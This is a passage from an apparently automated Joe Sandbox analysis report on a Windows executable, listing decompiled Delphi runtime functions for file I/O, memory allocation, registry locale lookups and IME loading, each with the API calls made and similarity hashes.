                                  				signed int _t21;
                                  
                                  				_t6 = __eax | 0xffffffff;
                                  				_t21 = __edx & 0x00000003;
                                  				if(_t21 <= 2 && (__edx & 0x000000f0) <= 0x40) {
                                  					_t14 = CreateFileA(E004045DC(__eax),  *(0x46e140 + _t21 * 4),  *(0x46e14c + ((__edx & 0x000000f0) >> 4) * 4), 0, 3, 0x80, 0); // executed
                                  					return _t14;
                                  				}
                                  				return _t6;
                                  			}







                                  APIs
                                  • CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,00412020,00416106,00000000,0041617A,?,?,00412020), ref: 00408472
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: f8f76e3bace43c7003b6a07901b4df0e6026c36ac2d243b74c8cc72463cb9e46
                                  • Instruction ID: 9e4920f008fc1151ba568213443a4bc2a71d27b7ab7fac706f397d736cfc79ae
                                  • Opcode Fuzzy Hash: f8f76e3bace43c7003b6a07901b4df0e6026c36ac2d243b74c8cc72463cb9e46
                                  • Instruction Fuzzy Hash: 76E09BF274051026F23069DD9CC2F9B6189C786769F194136F554FB3D1D4BC8C019269
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004084D4(void* __eax, long __edx, long _a4, long _a8) {
                                  				long _v8;
                                  				long _v12;
                                  				long _t15;
                                  
                                  				_v12 = _a4;
                                  				_v8 = _a8;
                                  				_t15 = SetFilePointer(__eax, _v12,  &_v8, __edx); // executed
                                  				_v12 = _t15;
                                  				return _v12;
                                  			}







                                  APIs
                                  • SetFilePointer.KERNEL32(?,?,?), ref: 004084F6
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: 93dc9ae3820cb81673042d9f4bb93040122fbc435d1d1d4a74df4814d5fa303a
                                  • Instruction ID: df6ad577486d23821fe03ba961c4dba27dced79fa1586379a1a450d4e7dd168c
                                  • Opcode Fuzzy Hash: 93dc9ae3820cb81673042d9f4bb93040122fbc435d1d1d4a74df4814d5fa303a
                                  • Instruction Fuzzy Hash: 02E05976905218BF9B40DB98D8819DEB7FCEB48220F2081A6A958E3341E671AF509B94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041E6E8(void* __eax, struct tagSIZE* __ecx, void* __edx, void* __eflags) {
                                  				int _t9;
                                  				int _t13;
                                  				void* _t14;
                                  
                                  				_t14 = __eax;
                                  				E0041E9AC(__eax, __ecx,  *0x41e728 & 0x000000ff);
                                  				 *__ecx = 0;
                                  				__ecx->cy = 0;
                                  				_t9 = E004043DC(__edx);
                                  				_t13 = GetTextExtentPoint32A( *(_t14 + 4), E004045DC(__edx), _t9, __ecx); // executed
                                  				return _t13;
                                  			}







                                  APIs
                                  • GetTextExtentPoint32A.GDI32(?,00000000,00000000), ref: 0041E71D
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ExtentPoint32Text
                                  • String ID:
                                  • API String ID: 223599850-0
                                  • Opcode ID: a9d2ac19edf858a4fbc53eb8ae38c7db87421830bb4f3e80dfc03867194868d5
                                  • Instruction ID: d5b8dda7caf6bd9b03dd8af8117e25c36796ffde2b93b61ac3d1513a6aa63cf5
                                  • Opcode Fuzzy Hash: a9d2ac19edf858a4fbc53eb8ae38c7db87421830bb4f3e80dfc03867194868d5
                                  • Instruction Fuzzy Hash: 04E04FA63102101F9750AB7E5C80967AADD8ECD224304843BB548D3243D578C8009724
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 55%
                                  			E004388D8(intOrPtr __eax) {
                                  				intOrPtr _v8;
                                  				intOrPtr _t14;
                                  				intOrPtr _t16;
                                  				intOrPtr _t21;
                                  				intOrPtr _t24;
                                  
                                  				_v8 = __eax;
                                  				 *(_v8 + 0x54) =  *(_v8 + 0x54) | 0x00000200;
                                  				_push(_t24);
                                  				_push(0x438925);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t24;
                                  				_t14 =  *((intOrPtr*)(_v8 + 0x188));
                                  				_push(_t14); // executed
                                  				L00406604(); // executed
                                  				if(_t14 == 0) {
                                  					E0040CAFC();
                                  				}
                                  				_pop(_t21);
                                  				 *[fs:eax] = _t21;
                                  				_push(0x43892c);
                                  				_t16 = _v8;
                                  				 *(_t16 + 0x54) =  *(_t16 + 0x54) & 0x0000fdff;
                                  				return _t16;
                                  			}









                                  APIs
                                  • 72E89840.USER32(?,00000000,00438925), ref: 00438900
                                    • Part of subcall function 0040CAFC: GetLastError.KERNEL32(0040CBAC,?,00415FF3,?), ref: 0040CAFC
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: E89840ErrorLast
                                  • String ID:
                                  • API String ID: 1681082125-0
                                  • Opcode ID: 312d335a21c74f3f605cd666d2aec36ad51cf25c6cbae57883234a69e8b94a03
                                  • Instruction ID: ebd8038dcea74eafc0d3b3ca46d80d33777937119dafea280f90645ea1dad0d1
                                  • Opcode Fuzzy Hash: 312d335a21c74f3f605cd666d2aec36ad51cf25c6cbae57883234a69e8b94a03
                                  • Instruction Fuzzy Hash: A1F0A771204308EFD711CB69C941E6DB7E8EB0C704B5204BAF800D3651EA38DD00D619
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405170(void* __eax) {
                                  				char _v272;
                                  				intOrPtr _t14;
                                  				void* _t16;
                                  				intOrPtr _t18;
                                  				intOrPtr _t19;
                                  
                                  				_t16 = __eax;
                                  				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                  					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
                                  					_t14 = E004053D4(_t19); // executed
                                  					_t18 = _t14;
                                  					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                                  					if(_t18 == 0) {
                                  						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
                                  					}
                                  				}
                                  				return  *((intOrPtr*)(_t16 + 0x10));
                                  			}









                                  APIs
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040518E
                                    • Part of subcall function 004053D4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,00000000), ref: 004053F0
                                    • Part of subcall function 004053D4: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,00000000), ref: 0040540E
                                    • Part of subcall function 004053D4: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,00000000), ref: 0040542C
                                    • Part of subcall function 004053D4: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 0040544A
                                    • Part of subcall function 004053D4: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004054D9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405493
                                    • Part of subcall function 004053D4: RegQueryValueExA.ADVAPI32(?,00405640,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004054D9,?,80000001), ref: 004054B1
                                    • Part of subcall function 004053D4: RegCloseKey.ADVAPI32(?,004054E0,00000000,?,?,00000000,004054D9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004054D3
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Open$FileModuleNameQueryValue$Close
                                  • String ID:
                                  • API String ID: 2796650324-0
                                  • Opcode ID: 092448762e68ca77ddbc996cee487d8ecb53dfa4f52a9641e8106825600ccee7
                                  • Instruction ID: e0c66f3e0a29b73bafbef0c2885c46a7d8e3f7bd6260490d64f9d9a1ac85e36c
                                  • Opcode Fuzzy Hash: 092448762e68ca77ddbc996cee487d8ecb53dfa4f52a9641e8106825600ccee7
                                  • Instruction Fuzzy Hash: 2CE06D71A046148FDB10DE68C8C1A4733E8AB08754F000AA6EC54EF386D3B8DD208BE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E0040847C(void* __eax, long __ecx, void* __edx) {
                                  				long _v16;
                                  				int _t4;
                                  
                                  				_push(__ecx);
                                  				_t4 = ReadFile(__eax, __edx, __ecx,  &_v16, 0); // executed
                                  				if(_t4 == 0) {
                                  					_v16 = 0xffffffff;
                                  				}
                                  				return _v16;
                                  			}






                                  APIs
                                  • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00408490
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 23b0986097739bb17f84c5b6e84c540fa1422d41cd323f2d2569a5b4f870bfc3
                                  • Instruction ID: 6ef1a873f201276505486c2b3419eeb5021042befa0cdf43492526d369c999bc
                                  • Opcode Fuzzy Hash: 23b0986097739bb17f84c5b6e84c540fa1422d41cd323f2d2569a5b4f870bfc3
                                  • Instruction Fuzzy Hash: BCD05B763181117BD220A65B5D44EA75BDCCBC5774F11063EB598C71C1D6348C0582B5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E004084A8(void* __eax, long __ecx, void* __edx) {
                                  				long _v16;
                                  				int _t4;
                                  
                                  				_push(__ecx);
                                  				_t4 = WriteFile(__eax, __edx, __ecx,  &_v16, 0); // executed
                                  				if(_t4 == 0) {
                                  					_v16 = 0xffffffff;
                                  				}
                                  				return _v16;
                                  			}






                                  APIs
                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004084BC
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: 9ca33dfb9204591eace900fa114506e2aa6f4db29c117e66ad428c2eaa4edf8a
                                  • Instruction ID: a1e2b7924e7da223918a2db0578c5a1e1a70929bb187246dca29f7127b5cce07
                                  • Opcode Fuzzy Hash: 9ca33dfb9204591eace900fa114506e2aa6f4db29c117e66ad428c2eaa4edf8a
                                  • Instruction Fuzzy Hash: 6FD05B723081117AD220965B9D84DA76BDCCBC5770F11073EB59CC31C1D6308C018275
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00401608(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				void* _v28;
                                  				intOrPtr* _v32;
                                  				intOrPtr* _t26;
                                  				intOrPtr _t29;
                                  				int _t34;
                                  				intOrPtr* _t39;
                                  				intOrPtr* _t46;
                                  				void* _t47;
                                  				void* _t48;
                                  				intOrPtr* _t49;
                                  
                                  				_t49 =  &_v20;
                                  				_v32 = __ecx;
                                  				 *_t49 = __edx;
                                  				_v28 = 0xffffffff;
                                  				_v24 = 0;
                                  				_t48 = __eax;
                                  				_v20 =  *_t49 + __eax;
                                  				_t39 =  *0x4705e8; // 0x4705e8
                                  				while(_t39 != 0x4705e8) {
                                  					_t46 =  *_t39;
                                  					_t5 = _t39 + 8; // 0x0
                                  					_t47 =  *_t5;
                                  					if(_t48 <= _t47) {
                                  						_t6 = _t39 + 0xc; // 0x0
                                  						if(_t47 +  *_t6 <= _v20) {
                                  							if(_t47 < _v28) {
                                  								_v28 = _t47;
                                  							}
                                  							_t10 = _t39 + 0xc; // 0x0
                                  							if(_t47 +  *_t10 > _v24) {
                                  								_t12 = _t39 + 8; // 0x0
                                  								_t13 = _t39 + 0xc; // 0x0
                                  								_v24 =  *_t12 +  *_t13;
                                  							}
                                  							_t34 = VirtualFree(_t47, 0, 0x8000); // executed
                                  							if(_t34 == 0) {
                                  								 *0x4705c4 = 1;
                                  							}
                                  							E00401410(_t39);
                                  						}
                                  					}
                                  					_t39 = _t46;
                                  				}
                                  				_t26 = _v32;
                                  				 *_t26 = 0;
                                  				if(_v24 == 0) {
                                  					return _t26;
                                  				}
                                  				 *_v32 = _v28;
                                  				_t29 = _v24 - _v28;
                                  				 *((intOrPtr*)(_v32 + 4)) = _t29;
                                  				return _t29;
                                  			}
















                                  APIs
                                  • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 00401672
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: ba80249a251de3ee35997ace5fbe70d6b1e1dbc426a0e22c7ca5c8142151c2d6
                                  • Instruction ID: 460f9af4ca393ca96be781d807a8049ba666e12b5de7044a0a5d5bfc730e7340
                                  • Opcode Fuzzy Hash: ba80249a251de3ee35997ace5fbe70d6b1e1dbc426a0e22c7ca5c8142151c2d6
                                  • Instruction Fuzzy Hash: 9921EA706043119FC710DF19C880A5BB7E1EF84764F19C96AE8989B3A5D735EC81CF9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004016C8(signed int __eax, void** __ecx, intOrPtr __edx) {
                                  				signed int _v20;
                                  				void** _v24;
                                  				void* _t15;
                                  				void** _t16;
                                  				void* _t17;
                                  				signed int _t27;
                                  				intOrPtr* _t29;
                                  				void* _t31;
                                  				intOrPtr* _t32;
                                  
                                  				_v24 = __ecx;
                                  				 *_t32 = __edx;
                                  				_t31 = __eax & 0xfffff000;
                                  				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                                  				 *_v24 = _t31;
                                  				_t15 = _v20 - _t31;
                                  				_v24[1] = _t15;
                                  				_t29 =  *0x4705e8; // 0x4705e8
                                  				while(_t29 != 0x4705e8) {
                                  					_t7 = _t29 + 8; // 0x0
                                  					_t17 =  *_t7;
                                  					_t8 = _t29 + 0xc; // 0x0
                                  					_t27 =  *_t8 + _t17;
                                  					if(_t31 > _t17) {
                                  						_t17 = _t31;
                                  					}
                                  					if(_t27 > _v20) {
                                  						_t27 = _v20;
                                  					}
                                  					if(_t27 > _t17) {
                                  						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                                  						if(_t15 == 0) {
                                  							_t16 = _v24;
                                  							 *_t16 = 0;
                                  							return _t16;
                                  						}
                                  					}
                                  					_t29 =  *_t29;
                                  				}
                                  				return _t15;
                                  			}













                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00401735
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 472705cc0e5028a4bb68b267383b8ea3bd30d081b1d04a6e844344bec03b5a4a
                                  • Instruction ID: 84ced009f6227253d2ecc12a81caae514daf4775232f95a49e6e6887a6054668
                                  • Opcode Fuzzy Hash: 472705cc0e5028a4bb68b267383b8ea3bd30d081b1d04a6e844344bec03b5a4a
                                  • Instruction Fuzzy Hash: C6118E76A057059FC310DF29C880A2BB7E5EFC4761F15C53EE598A73A4D734AC408B49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041AB90(intOrPtr _a4, intOrPtr _a8) {
                                  				void* _t14;
                                  				void _t15;
                                  				intOrPtr _t25;
                                  				char* _t26;
                                  				void* _t35;
                                  
                                  				if( *0x470888 == 0) {
                                  					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
                                  					_t35 = _t14;
                                  					_t15 =  *0x470884; // 0x22f0000
                                  					 *_t35 = _t15;
                                  					_t1 = _t35 + 4; // 0x4
                                  					E00402990(0x46e3e8, 2, _t1);
                                  					_t2 = _t35 + 5; // 0x5
                                  					 *((intOrPtr*)(_t35 + 6)) = E0041AB88(_t2, E0041AB68);
                                  					_t4 = _t35 + 0xa; // 0xa
                                  					_t26 = _t4;
                                  					do {
                                  						 *_t26 = 0xe8;
                                  						_t5 = _t35 + 4; // 0x4
                                  						 *((intOrPtr*)(_t26 + 1)) = E0041AB88(_t26, _t5);
                                  						 *((intOrPtr*)(_t26 + 5)) =  *0x470888;
                                  						 *0x470888 = _t26;
                                  						_t26 = _t26 + 0xd;
                                  					} while (_t26 - _t35 < 0xffc);
                                  					 *0x470884 = _t35;
                                  				}
                                  				_t25 =  *0x470888;
                                  				 *0x470888 =  *((intOrPtr*)(_t25 + 5));
                                  				 *((intOrPtr*)(_t25 + 5)) = _a4;
                                  				 *((intOrPtr*)(_t25 + 9)) = _a8;
                                  				return  *0x470888;
                                  			}

                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041ABAE
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 8d71270949e3a87b428584108315775b512043441b7fb5b769041ea24da1b128
                                  • Instruction ID: 5b564f1200556666a5d032e6845c0c23a100170eb02ad4eeaf4953249a448201
                                  • Opcode Fuzzy Hash: 8d71270949e3a87b428584108315775b512043441b7fb5b769041ea24da1b128
                                  • Instruction Fuzzy Hash: FE119E742453058FC310DF19C880B86F7E1EF48390F14C53AE9988B385D374E8518BAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E0040175C(void* __eax, void** __ecx, void* __edx) {
                                  				int _t7;
                                  				void* _t9;
                                  				signed int _t14;
                                  				intOrPtr* _t19;
                                  				signed int _t22;
                                  				void** _t23;
                                  
                                  				_push(__ecx);
                                  				 *_t23 = __eax + 0x00000fff & 0xfffff000;
                                  				_t22 = __eax + __edx & 0xfffff000;
                                  				 *__ecx =  *_t23;
                                  				_t7 = _t22 -  *_t23;
                                  				__ecx[1] = _t7;
                                  				_t19 =  *0x4705e8; // 0x4705e8
                                  				while(_t19 != 0x4705e8) {
                                  					_t2 = _t19 + 8; // 0x0
                                  					_t9 =  *_t2;
                                  					_t3 = _t19 + 0xc; // 0x0
                                  					_t14 =  *_t3 + _t9;
                                  					if(_t9 <  *_t23) {
                                  						_t9 =  *_t23;
                                  					}
                                  					if(_t22 < _t14) {
                                  						_t14 = _t22;
                                  					}
                                  					if(_t14 > _t9) {
                                  						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
                                  						if(_t7 == 0) {
                                  							 *0x4705c4 = 2;
                                  						}
                                  					}
                                  					_t19 =  *_t19;
                                  				}
                                  				return _t7;
                                  			}

                                  APIs
                                  • VirtualFree.KERNEL32(00000000,00000000,00004000,?,?,?,?,?,004019C3), ref: 004017B6
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: ade74023f2782f7dc78d4e45098a811d16bc0b53614a6118611f4b72f8f164e6
                                  • Instruction ID: 9dd01667c080499e3d5f3b6146f1a75adcdb4b2a221b3398bc89655277111eb7
                                  • Opcode Fuzzy Hash: ade74023f2782f7dc78d4e45098a811d16bc0b53614a6118611f4b72f8f164e6
                                  • Instruction Fuzzy Hash: EA01F77A6052049FC310DE29DCC0A2A77E8EB84364F15453EDA88AB391D33A6C458BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004161A4(signed int __edx) {
                                  				void* _t2;
                                  				void* _t3;
                                  				void* _t4;
                                  				void* _t6;
                                  				signed int _t10;
                                  
                                  				_t3 = E00403764(_t2, __edx);
                                  				_t10 = __edx;
                                  				_t14 = _t3;
                                  				_t4 =  *(_t3 + 4);
                                  				if(_t4 >= 0) {
                                  					CloseHandle(_t4); // executed
                                  				}
                                  				_t6 = E00403388(_t10 & 0x000000fc);
                                  				if(_t10 > 0) {
                                  					return E0040370C(_t14);
                                  				}
                                  				return _t6;
                                  			}

                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: 1c668aa86592ff6cb53c1dbe63481fdc2a545734b5b6fa1e5ff1f7f5f5bd8094
                                  • Instruction ID: d51b83a6ae76d7c9953a79ad3501f6c6cda8f639d4b1248b7be0fa268f9fc90d
                                  • Opcode Fuzzy Hash: 1c668aa86592ff6cb53c1dbe63481fdc2a545734b5b6fa1e5ff1f7f5f5bd8094
                                  • Instruction Fuzzy Hash: EAD05EB1700B201286117A7E1DC268B5A8C4E426AA309863EF854EB2D3EB3DCE01429C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  C-Code - Quality: 83%
                                  			E00440A48() {
                                  				int _v8;
                                  				intOrPtr _t4;
                                  				struct HINSTANCE__* _t11;
                                  				struct HINSTANCE__* _t13;
                                  				struct HINSTANCE__* _t15;
                                  				struct HINSTANCE__* _t17;
                                  				struct HINSTANCE__* _t19;
                                  				struct HINSTANCE__* _t21;
                                  				struct HINSTANCE__* _t23;
                                  				struct HINSTANCE__* _t25;
                                  				struct HINSTANCE__* _t27;
                                  				struct HINSTANCE__* _t29;
                                  				intOrPtr _t40;
                                  				intOrPtr _t42;
                                  				intOrPtr _t44;
                                  
                                  				_t42 = _t44;
                                  				_t4 =  *0x46fdc8; // 0x470744
                                  				if( *((char*)(_t4 + 0xc)) == 0) {
                                  					return _t4;
                                  				} else {
                                  					_v8 = SetErrorMode(0x8000);
                                  					_push(_t42);
                                  					_push(0x440bae);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t44;
                                  					if( *0x470af4 == 0) {
                                  						 *0x470af4 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
                                  					}
                                  					if( *0x46ee1c == 0) {
                                  						 *0x46ee1c = LoadLibraryA("imm32.dll");
                                  						if( *0x46ee1c != 0) {
                                  							_t11 =  *0x46ee1c; // 0x0
                                  							 *0x470af8 = GetProcAddress(_t11, "ImmGetContext");
                                  							_t13 =  *0x46ee1c; // 0x0
                                  							 *0x470afc = GetProcAddress(_t13, "ImmReleaseContext");
                                  							_t15 =  *0x46ee1c; // 0x0
                                  							 *0x470b00 = GetProcAddress(_t15, "ImmGetConversionStatus");
                                  							_t17 =  *0x46ee1c; // 0x0
                                  							 *0x470b04 = GetProcAddress(_t17, "ImmSetConversionStatus");
                                  							_t19 =  *0x46ee1c; // 0x0
                                  							 *0x470b08 = GetProcAddress(_t19, "ImmSetOpenStatus");
                                  							_t21 =  *0x46ee1c; // 0x0
                                  							 *0x470b0c = GetProcAddress(_t21, "ImmSetCompositionWindow");
                                  							_t23 =  *0x46ee1c; // 0x0
                                  							 *0x470b10 = GetProcAddress(_t23, "ImmSetCompositionFontA");
                                  							_t25 =  *0x46ee1c; // 0x0
                                  							 *0x470b14 = GetProcAddress(_t25, "ImmGetCompositionStringA");
                                  							_t27 =  *0x46ee1c; // 0x0
                                  							 *0x470b18 = GetProcAddress(_t27, "ImmIsIME");
                                  							_t29 =  *0x46ee1c; // 0x0
                                  							 *0x470b1c = GetProcAddress(_t29, "ImmNotifyIME");
                                  						}
                                  					}
                                  					_pop(_t40);
                                  					 *[fs:eax] = _t40;
                                  					_push(0x440bb5);
                                  					return SetErrorMode(_v8);
                                  				}
                                  			}

                                  APIs
                                  • SetErrorMode.KERNEL32(00008000), ref: 00440A61
                                  • GetModuleHandleA.KERNEL32(USER32,00000000,00440BAE,?,00008000), ref: 00440A85
                                  • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00440A92
                                  • LoadLibraryA.KERNEL32(imm32.dll,00000000,00440BAE,?,00008000), ref: 00440AAE
                                  • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00440AD0
                                  • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00440AE5
                                  • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00440AFA
                                  • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00440B0F
                                  • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00440B24
                                  • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00440B39
                                  • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00440B4E
                                  • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00440B63
                                  • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00440B78
                                  • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00440B8D
                                  • SetErrorMode.KERNEL32(?,00440BB5,00008000), ref: 00440BA8
                                  Similarity
                                  • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                  • String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
                                  • API String ID: 3397921170-3950384806
                                  • Opcode ID: 0416b1b5c3b3c8ee46c135cc34149c0ad09557ae09a3595f8f73b8d56c264787
                                  • Instruction ID: c8ab60e8da90c3335b729d234f80af5c7a187982ff55dbe7744613ebb3b96525
                                  • Opcode Fuzzy Hash: 0416b1b5c3b3c8ee46c135cc34149c0ad09557ae09a3595f8f73b8d56c264787
                                  • Instruction Fuzzy Hash: 8B313E74785340EEE704EBE2DC46E1637E8E344708B11447AF605DB291E6FEA9A08F1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 53%
                                  			E00405210(char* __eax, intOrPtr __edx) {
                                  				char* _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				void* _v20;
                                  				struct _WIN32_FIND_DATAA _v338;
